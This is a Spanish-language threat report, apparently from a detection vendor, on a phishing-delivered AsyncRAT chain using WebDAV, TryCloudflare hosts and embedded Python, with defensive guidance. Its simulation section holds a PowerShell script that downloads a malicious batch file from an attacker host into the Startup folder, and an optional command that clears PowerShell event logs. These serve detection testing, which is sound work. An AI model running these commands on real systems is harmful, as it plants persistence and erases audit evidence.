SOC Prime Bias: Crítico

14 Jan 2026 15:04 UTC

Cómo MDR Descubrió una Cadena de Ataque Multi-Etapa de AsyncRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Cómo MDR Descubrió una Cadena de Ataque Multi-Etapa de AsyncRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe describe una cadena de intrusión de múltiples etapas iniciada a través de correos electrónicos de phishing que entregan señuelos ZIP con doble extensión y se transforman en una secuencia de payload alojada en WebDAV. Los operadores abusan de la infraestructura gratuita de Cloudflare y de componentes de Python empaquetados para desplegar AsyncRAT en los endpoints de las víctimas. La ejecución y persistencia dependen de herramientas nativas de Windows—Windows Script Host, PowerShell y scripts por lotes—mientras que la etapa final utiliza la inyección de código en explorer.exe. Al encauzar la entrega y el montaje a través de servicios en la nube ampliamente confiables, la actividad se mezcla con el tráfico normal y puede eludir los controles perimetrales convencionales.

Investigación

Los investigadores de Trend Micro informaron sobre telemetría consistente con un flujo de entrega en etapas: recuperación de un archivo .pdf.zip desde Dropbox, ejecución de accesos directos .url integrados y posterior interacción con WebDAV atribuida a svchost.exe y rundll32.exe. La cadena luego desplegó archivos embebidos de Python 3.14.0, que se utilizaron para ejecutar un script de Python personalizado responsable de la inyección APC del shellcode de AsyncRAT. La persistencia se logró colocando archivos por lotes en el directorio de Inicio del usuario. Los analistas también identificaron y correlacionaron múltiples anfitriones TryCloudflare que respaldan la infraestructura.

Mitigación

Reduzca la exposición entrenando a los usuarios para tratar los archivos adjuntos de doble extensión y los archivos ZIP inesperados como sospechosos y endureciendo el filtrado de enlaces en la nube entregados por phishing. Bloquee o controle estrictamente el acceso a servicios de túneles en la nube no sancionados y monitoree una dependencia anormal en WebDAV en entornos donde es poco común. Restrinja la ejecución de scripts desde directorios modificables por el usuario, y refuerce los controles en torno al uso de la carpeta de Inicio y la creación de tareas programadas. Priorice las detecciones EDR/behaviorales que puedan identificar cadenas de ejecución impulsadas por scripts y técnicas de inyección de código dirigidas a procesos benignos.

Respuesta

Si se detecta actividad, aísle el endpoint y detenga los procesos sospechosos asociados con la cadena (particularmente svchost.exe, rundll32.exe y python.exe cuando estén vinculados al incidente). Elimine la persistencia eliminando artefactos maliciosos por lotes del directorio de Inicio, erradique los archivos de Python descargados y cualquier componente de AsyncRAT, y realice un barrido forense completo para detectar archivos de montaje adicionales y movimientos laterales. Actualice los controles de red y las listas de bloqueo para incluir los dominios de TryCloudflare identificados y cualquier infraestructura asociada observada durante el triaje.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Comprobación de Pre‑vuelo de Telemetría y Línea Base debe haberse aprobado.

  • Narrativa de Ataque y Comandos

    Un adversario que ha logrado acceso inicial a PowerShell en un host de Windows comprometido quiere configurar un entorno de ejecución de Python y lograr la persistencia. Ellos:

    1. Descargan la distribución embebida de Python directamente al directorio Temp del usuario utilizando Invoke‑WebRequest.
    2. Descargan un script por lotes malicioso (ahke.bat) desde un dominio proxied por Cloudflare a la carpeta de Inicio del usuario para que se ejecute en cada inicio de sesión.
    3. Ejecutan el archivo zip de Python descargado (omitido aquí por brevedad) para ejecutar cargas útiles adicionales.

    Estos pasos producen exactamente las cadenas de comando que coinciden con la regla Sigma, generando registros de script‑block de PowerShell con el patrón iwr … -OutFile … .

  • Script de Prueba de Regresión

    # -------------------------------------------------
    # Simulación PowerShell de configuración de entorno de AsyncRAT
    # -------------------------------------------------
    
    # 1. Descargar zip embebido de Python a la carpeta temp del usuario
    $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
    $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
    iwr $pythonUrl -OutFile $pythonDest
    
    # 2. Descargar archivo por lotes malicioso al Inicio para persistencia
    $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
    $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
    iwr $batUrl -OutFile $batDest
    
    # 3. (Opcional) Activar ejecución del lote para demostrar persistencia
    # Start-Process -FilePath $batDest -WindowStyle Hidden
    # -------------------------------------------------
  • Comandos de Limpieza

    # Eliminar los artefactos descargados
    Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue
    
    # Opcionalmente borrar registros de script block de PowerShell (requiere admin)
    # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"